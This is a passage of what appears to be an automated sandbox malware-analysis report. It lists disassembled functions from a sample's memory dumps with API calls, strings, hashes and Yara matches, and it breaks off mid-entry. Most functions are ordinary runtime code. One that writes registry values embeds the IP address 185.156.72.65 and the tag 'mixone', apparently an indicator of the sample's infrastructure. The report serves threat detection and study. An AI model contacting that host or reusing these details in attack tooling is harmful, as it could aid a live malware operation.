                        • Opcode Fuzzy Hash: 1f1184e7a09d65eff5b8ffcd4e3bf1005a55978abbf3cbcf98c0185f47ed9858
                        • Instruction Fuzzy Hash: 7B41B4B5C0421CAEDF20DF69CC89AEABBB8AF44304F1442DEE419D3241DA389E85CF54
                        Function 0494798E Relevance: 1.6, APIs: 1, Instructions: 140COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.4515886279.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4930000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 1f1184e7a09d65eff5b8ffcd4e3bf1005a55978abbf3cbcf98c0185f47ed9858
                        • Instruction ID: 3c86b5082e8d69261092a566fc7116ef82f045dd3f36460ee5d119ba5ccfeeec
                        • Opcode Fuzzy Hash: 1f1184e7a09d65eff5b8ffcd4e3bf1005a55978abbf3cbcf98c0185f47ed9858
                        • Instruction Fuzzy Hash: 9E4185B580421DAFDB20DFA9CC88EEABBBDEF85304F1441E9E41993240DB34AE458F50
                        Function 0040EF09 Relevance: 1.6, Strings: 1, Instructions: 333COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4514119165.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: 0
                        • API String ID: 0-4108050209
                        • Opcode ID: 8470d482166b29df0f0bdf2b707670bb0d2149d7074c5d4c6b8b9bc3646ec2c9
                        • Instruction ID: a862614980e7782cfb360a41e62bb903fc37a91afa162c473b4857922a947482
                        • Opcode Fuzzy Hash: 8470d482166b29df0f0bdf2b707670bb0d2149d7074c5d4c6b8b9bc3646ec2c9
                        • Instruction Fuzzy Hash: DDC1EE309006079ECB34CE69C584A7BBBB1AB45304F144A7FD856B7BD2C339AD0ACB59
                        Function 0493F170 Relevance: 1.6, Strings: 1, Instructions: 333COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4515886279.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4930000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: 0
                        • API String ID: 0-4108050209
                        • Opcode ID: 8eb8cff735118d4cdf18e48b5e4fd70e4005089286b1f543a5e77019ad8e0901
                        • Instruction ID: 80d39860ba596042c6fc9439c19d35131d79081112385e104b5c6a497e5f476b
                        • Opcode Fuzzy Hash: 8eb8cff735118d4cdf18e48b5e4fd70e4005089286b1f543a5e77019ad8e0901
                        • Instruction Fuzzy Hash: 14C1E238E00606CFDB24CF68C588A7ABBBAFF87306F144A39D45697699D330B945CB51
                        Function 0040EBC7 Relevance: 1.6, Strings: 1, Instructions: 318COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4514119165.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: 0
                        • API String ID: 0-4108050209
                        • Opcode ID: 0c5b649a34a28a7901ced7402a87d0ab1891e4bc7ca1eda254f1c36e1c86cddc
                        • Instruction ID: c83ad001e3c04e1f23fe5313526111bf351830610e2bf169758c16327f184a9c
                        • Opcode Fuzzy Hash: 0c5b649a34a28a7901ced7402a87d0ab1891e4bc7ca1eda254f1c36e1c86cddc
                        • Instruction Fuzzy Hash: 3EB1E47090460B8BDB248E6AC555ABFB7A1AF41304F140E3FD452B77C1C73EAD268B89
                        Function 0493EE2E Relevance: 1.6, Strings: 1, Instructions: 318COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4515886279.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4930000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: 0
                        • API String ID: 0-4108050209
                        • Opcode ID: 879cce724f58335765498cd27df84c01b4e50fca817c5947501d6afb968e75ec
                        • Instruction ID: df02c9979792838335ad85f5bf0a52fdc08c31d9d2e86d80961a4d51b3c6a9f5
                        • Opcode Fuzzy Hash: 879cce724f58335765498cd27df84c01b4e50fca817c5947501d6afb968e75ec
                        • Instruction Fuzzy Hash: 0EB1D374A0460B8BDF348FA8C558ABEBBA9EF47306F04063DE452D7694D771B901CB51
                        Function 0040A720 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                        Download Yara Rule
                        APIs
                        • SetUnhandledExceptionFilter.KERNEL32(Function_0000A72C,0040A0A4), ref: 0040A725
                        Memory Dump Source
                        • Source File: 00000000.00000002.4514119165.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExceptionFilterUnhandled
                        • String ID:
                        • API String ID: 3192549508-0
                        • Opcode ID: f7f15cac9e9bf66a9e2158eab73941a450ed06a429c5457dfeeb9365a06e4f3f
                        • Instruction ID: 2e9130e8fabf2091f020550841097bdee3684dee1eb7d8ffdadd4873c3d8fa43
                        • Opcode Fuzzy Hash: f7f15cac9e9bf66a9e2158eab73941a450ed06a429c5457dfeeb9365a06e4f3f
                        • Instruction Fuzzy Hash:
                        Function 0493A987 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                        Download Yara Rule
                        APIs
                        • SetUnhandledExceptionFilter.KERNEL32(0040A72C,0493A30B), ref: 0493A98C
                        Memory Dump Source
                        • Source File: 00000000.00000002.4515886279.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4930000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExceptionFilterUnhandled
                        • String ID:
                        • API String ID: 3192549508-0
                        • Opcode ID: f7f15cac9e9bf66a9e2158eab73941a450ed06a429c5457dfeeb9365a06e4f3f
                        • Instruction ID: 2e9130e8fabf2091f020550841097bdee3684dee1eb7d8ffdadd4873c3d8fa43
                        • Opcode Fuzzy Hash: f7f15cac9e9bf66a9e2158eab73941a450ed06a429c5457dfeeb9365a06e4f3f
                        • Instruction Fuzzy Hash:
                        Function 00473E95 Relevance: 1.5, Strings: 1, Instructions: 212COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4514188391.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_470000_file.jbxd
                        Similarity
                        • API ID:
                        • String ID: NTDL
                        • API String ID: 0-3662016964
                        • Opcode ID: ea1a609b4e81e7ed3fd3bef85d183cecf4d96ae76ec57f2d8d21cd8a4a84b692
                        • Instruction ID: e7beae17156f010978ca05b93af2ee6da6283093d04dc20b6ad1bd8cd610a5b2
                        • Opcode Fuzzy Hash: ea1a609b4e81e7ed3fd3bef85d183cecf4d96ae76ec57f2d8d21cd8a4a84b692
                        • Instruction Fuzzy Hash: 9651387290820E8FDB11CF24C5401FF37A1EB96361F24C52BD84A97A41C77A4E66EE5E
                        Function 00418592 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.4514119165.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: HeapProcess
                        • String ID:
                        • API String ID: 54951025-0
                        • Opcode ID: 7769912fe868597113bc2185a5bbbb46458ecd65f2a9e081601031a621f49aa8
                        • Instruction ID: 3c2d4b823819c0ef79fadcf046fefbcb2a87197a19d2065c9f8a0fe70da1ab12
                        • Opcode Fuzzy Hash: 7769912fe868597113bc2185a5bbbb46458ecd65f2a9e081601031a621f49aa8
                        • Instruction Fuzzy Hash: 80A02230B00200CF83208F32EE0830C3EF8FB8C2C0300C038A000C0232EB3880828B08
                        Function 00415E59 Relevance: .6, Instructions: 637COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.4514119165.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: bed945026c03525ca9e6f99888b728c839f34034abb34f6e91111b4f97e8ed69
                        • Instruction ID: 2119cb9e33fec53289003fbb8559c0bd9e138a5c3f232e450aa7d4159409e329
                        • Opcode Fuzzy Hash: bed945026c03525ca9e6f99888b728c839f34034abb34f6e91111b4f97e8ed69
                        • Instruction Fuzzy Hash: 91320331E29F014DD7239A34D922336A649AFB73D4F56D737E819B5AA9EF28C4C34108
                        Function 004CAA34 Relevance: .4, Instructions: 358COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.4514188391.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_470000_file.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 795ce4d5db040fe7b2670f22b5c42f9535ba4be31fe7cac5747439c07610cab3
                        • Instruction ID: 3162a93822651030013cfd1b0b8a031ca16124ca1060970b9da85eb71985d6cb
                        • Opcode Fuzzy Hash: 795ce4d5db040fe7b2670f22b5c42f9535ba4be31fe7cac5747439c07610cab3
                        • Instruction Fuzzy Hash: 7BC1DEB3F106254BF3544978DCA83A26683DBD5324F2F82798E18ABBC5DD7E8D095384
                        Function 004D355D Relevance: .3, Instructions: 298COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.4514188391.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_470000_file.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 1b2d9c5febe006f0d65a44a417e5e8a508d5c7830f743731935974e8b25fc2fb
                        • Instruction ID: ef3ca434e617e905d60d546a774afffe6db61fe8b3e148e167f2e0624312daf6
                        • Opcode Fuzzy Hash: 1b2d9c5febe006f0d65a44a417e5e8a508d5c7830f743731935974e8b25fc2fb
                        • Instruction Fuzzy Hash: CCA1AEF7F506254BF3944879DC983626582D7A5320F2F42388FA8AB7C6DCBE5D065384
                        Function 00472B30 Relevance: .2, Instructions: 210COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.4514188391.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_470000_file.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: dc44dbd5c630dac6c9b1a29de68d75b6483f932b79fc972efcbf5d78b73ff21e
                        • Instruction ID: ae5f5f49748f8c8d9f3ba456470f87cdb2d9ce20f9f3c60a0ddcee940c277048
                        • Opcode Fuzzy Hash: dc44dbd5c630dac6c9b1a29de68d75b6483f932b79fc972efcbf5d78b73ff21e
                        • Instruction Fuzzy Hash: 3A716AB3F512224BF3544879CD583A2668397D5320F3F82798A5CABBC5DDBE4D0A5384
                        Function 004D5A3E Relevance: .2, Instructions: 206COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.4514188391.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_470000_file.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: aa0af5d9f0c274996ab38a2b9082a1e1bb8723b3ba52b4819f224f7e4fa6d0d0
                        • Instruction ID: 85db9778a69d6c359d3ee4fa4b6bc6f00db14e3382dd386afe92789216cd99d7
                        • Opcode Fuzzy Hash: aa0af5d9f0c274996ab38a2b9082a1e1bb8723b3ba52b4819f224f7e4fa6d0d0
                        • Instruction Fuzzy Hash: 9371EEF3F516254BF3440A28DCA93627692DBA5320F2F01BD8E59AB3C2D97E5E0593C4
                        Function 00513A24 Relevance: .2, Instructions: 181COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.4514188391.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_470000_file.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: c993dfcd7b9414fe059675356f3c0351196a93939db204e71a9b295cdb8a096e
                        • Instruction ID: 3a4053cd7ecc5b6df29484da356bc9db21ae31b340041868f2eb99ced90f3cfc
                        • Opcode Fuzzy Hash: c993dfcd7b9414fe059675356f3c0351196a93939db204e71a9b295cdb8a096e
                        • Instruction Fuzzy Hash: FB51C0B2A0C7008FE3046F29EC8576AFBE9FF94720F16893DD6C487744E67858418B82
                        Function 0053D9BE Relevance: .2, Instructions: 181COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.4514188391.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_470000_file.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 94a7bf68871dd8c781ea6fff48605ffc2abce53e42e139ab3c4d051b031fea43
                        • Instruction ID: 24e7b203e6789462283b2a44cefaf85d5b011ea16196b6eba8c87f8c4e1add18
                        • Opcode Fuzzy Hash: 94a7bf68871dd8c781ea6fff48605ffc2abce53e42e139ab3c4d051b031fea43
                        • Instruction Fuzzy Hash: 5651D4F39083109BE3046E29EC8536AFBE5EF98360F17893DDAC497784E63458458AC7
                        Function 004EC68A Relevance: .2, Instructions: 180COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.4514188391.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_470000_file.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: ee6ee58fc4200fcd9ae3d1f6129cfea77c8f21504085c19d8665a3511c24e48a
                        • Instruction ID: bfe4b03a4387e04c1b436b5175b51f8b8113250021b469b946bc0e587e2244bb
                        • Opcode Fuzzy Hash: ee6ee58fc4200fcd9ae3d1f6129cfea77c8f21504085c19d8665a3511c24e48a
                        • Instruction Fuzzy Hash: EC5128B3E082109FE3046E2DDD5577ABBD6DBC4330F2A463DEA9587384E9795C058782
                        Function 005C2A30 Relevance: .1, Instructions: 107COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.4514188391.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_470000_file.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 78210a8a613c3996315c5175b5af49ee0f721d0e1bffe9670397edaddce69db2
                        • Instruction ID: f2459b9f3fed13e1d032a9557076d6a748f5ada52150134f2c563181ac03ed4e
                        • Opcode Fuzzy Hash: 78210a8a613c3996315c5175b5af49ee0f721d0e1bffe9670397edaddce69db2
                        • Instruction Fuzzy Hash: 23318DB3F012254BF3888C35CDA83626683ABD5300F2B817D8B4A5B7C5DC7D1D099384
                        Function 006D2497 Relevance: .1, Instructions: 103COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.4514188391.00000000005F2000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F2000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5f2000_file.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2d98bdfcc07b2faa96b5220a3a1ac699474c444f1de9e79a08b128b9d91f7854
                        • Instruction ID: 821bd5d7d103e8d79783945bb35e924ff0d46978f8dce6fda428602346fab2a2
                        • Opcode Fuzzy Hash: 2d98bdfcc07b2faa96b5220a3a1ac699474c444f1de9e79a08b128b9d91f7854
                        • Instruction Fuzzy Hash: 543135B240C200DFE305BF29D88666EFBE4FF58750F06892DEAD482614E7355850CB87
                        Function 00474058 Relevance: .1, Instructions: 87COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.4514188391.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_470000_file.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 946258973a85aabf38e3e8f52200b2c2717268fc4551644f73bf58352faf976b
                        • Instruction ID: 2d7a33741b40062fc79572ffcbf29d5aa81ef6aa1a3922298448b3e4f0803e04
                        • Opcode Fuzzy Hash: 946258973a85aabf38e3e8f52200b2c2717268fc4551644f73bf58352faf976b
                        • Instruction Fuzzy Hash: 1321F77150924DDEDB119F64D2001FE7BA0FB96320F25892BE84A83A01D7794DA6AA1E
                        Function 0040B6D0 Relevance: .1, Instructions: 76COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.4514119165.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                        • Instruction ID: ca795268159c21d128c013142cdfc2d9b79cbc1da2bbaf958516ecc3655a5718
                        • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                        • Instruction Fuzzy Hash: 39113DBB24014243D614873DD9F49B7A395EBC5320B2D437BD1416B7D4D33AE9459A8C
                        Function 0493B937 Relevance: .1, Instructions: 76COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.4515886279.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4930000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                        • Instruction ID: 8ba1ab7b0bfeeb901e46fc60194cdb45568bb921775d1e8103c105e1eee8a698
                        • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                        • Instruction Fuzzy Hash: 021104772001828796558A2ED4B42B6F79EEFC732FB2C467AD0858F75BD222B144D600
                        Function 04787D41 Relevance: .1, Instructions: 61COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.4515810671.0000000004780000.00000040.00001000.00020000.00000000.sdmp, Offset: 04780000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4780000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                        • Instruction ID: 87d63b9c504f10c387b1538ec813dd5751f91771679579b4bd69b1c61f40f319
                        • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                        • Instruction Fuzzy Hash: 941182723801009FD754EF55DC90FA673EAEB89230B29805AED05CB315E675FC41C7A0
                        Function 04930D90 Relevance: .0, Instructions: 43COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.4515886279.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4930000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                        • Instruction ID: 9051fdc12d63c429d47f73a110bf54da03349bf3259fd21df59c7494944553dd
                        • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                        • Instruction Fuzzy Hash: F401A276B006049FDF21CF24C808BAA33E9FB87217F4544B5E91A9B289E774B9418B90
                        Function 00409BDD Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 51libraryloaderCOMMON
                        Download Yara Rule
                        APIs
                        • InitializeCriticalSectionAndSpinCount.KERNEL32(0042D064,00000FA0,?,?,00409BBB), ref: 00409BE9
                        • GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,00409BBB), ref: 00409BF4
                        • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,00409BBB), ref: 00409C05
                        • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00409C17
                        • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00409C25
                        • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,00409BBB), ref: 00409C48
                        • DeleteCriticalSection.KERNEL32(0042D064,00000007,?,?,00409BBB), ref: 00409C64
                        • CloseHandle.KERNEL32(00000000,?,?,00409BBB), ref: 00409C74
                        Strings
                        • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00409BEF
                        • kernel32.dll, xrefs: 00409C00
                        • SleepConditionVariableCS, xrefs: 00409C11
                        • WakeAllConditionVariable, xrefs: 00409C1D
                        Memory Dump Source
                        • Source File: 00000000.00000002.4514119165.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                        • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                        • API String ID: 2565136772-3242537097
                        • Opcode ID: 4fb7e18995e5e2f02b724b68456555f771a33f70ab985dbad30083c91c8ea3bd
                        • Instruction ID: 8f8b07cbf63392261d8dc325579aef03bb655b7cde116df0e27078c5153b7531
                        • Opcode Fuzzy Hash: 4fb7e18995e5e2f02b724b68456555f771a33f70ab985dbad30083c91c8ea3bd
                        • Instruction Fuzzy Hash: 6F015271F48711ABE7205BB4BD09F562BD8AB49705B554032BA05E22A2DB78CC068A6C
                        Function 0041C3CF Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 147COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,0041CECF), ref: 0041C3E8
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4514119165.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: DecodePointer
                        • String ID: acos$asin$exp$log$log10$pow$sqrt
                        • API String ID: 3527080286-3064271455
                        • Opcode ID: 15d817c9b1d0a4fbb0458c9f351412a41f7c6c9a49760990de8b925fd3443d3a
                        • Instruction ID: a42e5d16fde1fbafe1f90c690df07fce043cce1a805407c3827f836c313506d5
                        • Opcode Fuzzy Hash: 15d817c9b1d0a4fbb0458c9f351412a41f7c6c9a49760990de8b925fd3443d3a
                        • Instruction Fuzzy Hash: 2D51AD7198022AEBCB108F58EE8C1FE7F72FB44304F908057D481A6654C7BC99A6CB9D
                        Function 0040BCFB Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • type_info::operator==.LIBVCRUNTIME ref: 0040BE1A
                        • ___TypeMatch.LIBVCRUNTIME ref: 0040BF28
                        • _UnwindNestedFrames.LIBCMT ref: 0040C07A
                        • CallUnexpected.LIBVCRUNTIME ref: 0040C095
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4514119165.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                        • String ID: csm$csm$csm
                        • API String ID: 2751267872-393685449
                        • Opcode ID: d9d1dd97a28ed08d243fefd6e212ea817b405283f267b0edc229452d693e4b60
                        • Instruction ID: 33f924a654f9d1b13218269df17d2698b0e91053480f28ff55db22427738ff3f
                        • Opcode Fuzzy Hash: d9d1dd97a28ed08d243fefd6e212ea817b405283f267b0edc229452d693e4b60
                        • Instruction Fuzzy Hash: 38B1767180020AEFCF24DFA5C9819AEB7B5EF04314B14426BE9057B292D739EA51CFD9
                        Function 0493BF62 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • type_info::operator==.LIBVCRUNTIME ref: 0493C081
                        • ___TypeMatch.LIBVCRUNTIME ref: 0493C18F
                        • _UnwindNestedFrames.LIBCMT ref: 0493C2E1
                        • CallUnexpected.LIBVCRUNTIME ref: 0493C2FC
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4515886279.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4930000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                        • String ID: csm$csm$csm
                        • API String ID: 2751267872-393685449
                        • Opcode ID: d9d1dd97a28ed08d243fefd6e212ea817b405283f267b0edc229452d693e4b60
                        • Instruction ID: 2915e5f6b3d89eb84cad3e1e9624f9003781cc35021f82a78c33243d2f8adaa9
                        • Opcode Fuzzy Hash: d9d1dd97a28ed08d243fefd6e212ea817b405283f267b0edc229452d693e4b60
                        • Instruction Fuzzy Hash: 98B14972800A19EFDF25DFA4C8809AEB7B9BF46316F14416AE8217B211D731FA51CF91
                        Function 004058F0 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 122registrysleepCOMMON
                        Download Yara Rule
                        APIs
                        • RegCreateKeyExA.ADVAPI32(80000001,?,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00405923
                        • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020006,?), ref: 00405945
                        • RegSetValueExA.ADVAPI32(?,?,00000000,00000001,?), ref: 0040596D
                        • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00405976
                        • Sleep.KERNEL32(000003E8), ref: 00405AB0
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4514119165.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseCreateOpenSleepValue
                        • String ID: 185.156.72.65$185.156.72.65$mixone
                        • API String ID: 4111408922-485810328
                        • Opcode ID: 76a0eb9b053f2720e41b6ddde5d1263b2dfbe59c6a58b35459c5c5341c7fd760
                        • Instruction ID: d5f4d92326b12601678bd67615438d10f3376d08b80102dff59a3baec9f40a0a
                        • Opcode Fuzzy Hash: 76a0eb9b053f2720e41b6ddde5d1263b2dfbe59c6a58b35459c5c5341c7fd760
                        • Instruction Fuzzy Hash: 14419271210108AFEB08CF64DC95BEE7B65EF49300F90822DF916A66D2D778E9848F58
                        Function 04939E44 Relevance: 12.1, APIs: 8, Instructions: 51libraryloaderCOMMON
                        Download Yara Rule
                        APIs
                        • InitializeCriticalSectionAndSpinCount.KERNEL32(0042D064,00000FA0,?,?,04939E22), ref: 04939E50
                        • GetModuleHandleW.KERNEL32(0041FFC8,?,?,04939E22), ref: 04939E5B
                        • GetModuleHandleW.KERNEL32(0042000C,?,?,04939E22), ref: 04939E6C
                        • GetProcAddress.KERNEL32(00000000,00420028), ref: 04939E7E
                        • GetProcAddress.KERNEL32(00000000,00420044), ref: 04939E8C
                        • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,04939E22), ref: 04939EAF
                        • RtlDeleteCriticalSection.NTDLL(0042D064), ref: 04939ECB
                        • CloseHandle.KERNEL32(0042D060,?,?,04939E22), ref: 04939EDB
                        Memory Dump Source
